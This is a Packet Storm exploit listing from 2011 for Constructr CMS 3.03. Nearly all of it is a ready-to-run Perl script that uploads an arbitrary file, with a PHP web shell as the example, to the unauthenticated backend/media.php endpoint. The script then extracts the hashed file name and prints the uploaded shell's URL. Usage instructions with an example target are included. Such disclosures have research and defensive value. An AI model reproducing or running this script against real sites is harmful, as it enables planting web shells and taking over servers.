Constructr CMS 3.03 Shell Upload

2011-03-23T00:00:00
ID PACKETSTORM:99665
Type packetstorm
Reporter plucky
Modified 2011-03-23T00:00:00

Description

                                        
                                            `#!/usr/bin/env perl  
  
# Constructr CMS 3.03 Arbitrary File Upload  
#  
# Author: plucky  
# Email: io.plucky@gmail.com   
#  
# Vulnerable Page: /constructr/backend/media.php [line  
# App Download: http://sourceforge.net/projects/constructr/  
#  
# Date: 23/03/2011  
# THX TO: yawn, shrod, h473 and DoMinO  
  
use strict;  
use warnings;  
  
use LWP::UserAgent;  
use HTTP::Request::Common qw( POST );  
  
  
my $host = '';  
my $file_to_upload = '';  
my $new_file_name = '';  
my $file_extension = '';  
  
  
sub exploit_usage {  
  
print 'Constructr CMS 3.03 Arbitrary File Upload' . "\n".  
'-------------------------' . "\n".  
'Author: plucky' . "\n".  
'Email: io.plucky@gmail.com' . "\n".  
'-------------------------' . "\n".  
'Usage:' . "\n".  
' perl xpl.pl [host]/[cms-path]/ /[path-file]/[file]' . "\n".  
'Example:' . "\n".  
' perl ' . $0 . ' http://vulnerable.com/constructr/ /home/plucky/shell.php' . "\n";  
  
exit;  
  
}  
  
sub file_parse {  
  
my $file_name = '';  
my $file_extension = '';  
my $file_to_upload = '';  
my $rfile_to_upload = '';  
  
  
$rfile_to_upload = shift;  
$file_to_upload = ${$rfile_to_upload};  
  
$file_to_upload =~ m/\/([a-z0-9]+)\.([a-z]+)/i;  
  
$file_name = $1;  
$file_extension = $2;  
  
return ( $file_name, $file_extension )  
  
}  
  
sub upload_file {  
  
my $host = '';  
my $rhost = '';  
my $file_name = '';  
my $file_extension = '';  
my $response = '';  
my $path = '';  
my $html = '';  
my $user_agent = '';  
my $file_to_upload = '';  
my $rfile_to_upload = '';  
my $new_file_name = '';  
  
  
( $rhost, $rfile_to_upload ) = @_;  
  
$host = ${$rhost};  
$file_to_upload = ${$rfile_to_upload};  
  
$user_agent = LWP::UserAgent->new;  
$path = $host . 'backend/media.php';  
  
  
$response = $user_agent->post(  
$path,  
[  
'create_file' => 'try',  
'file' => [$file_to_upload],  
],  
'Content_Type' => 'form-data'  
);  
  
  
( $file_name, $file_extension ) = file_parse( \$file_to_upload );  
  
  
$html = $response->decoded_content;  
$html =~ m/show_path=([a-f0-9]{32})\.$file_extension">$file_name\.$file_extension<\/a>/i;  
  
$new_file_name = $1;  
  
return ( $new_file_name, $file_extension );  
  
}  
  
@ARGV == 2  
? ( $host, $file_to_upload ) = @ARGV  
: exploit_usage();  
  
( $new_file_name, $file_extension ) = upload_file( \$host, \$file_to_upload );  
  
  
print $host, 'data/workspace/uploads/', $new_file_name, '.', $file_extension, "\n";  
  
`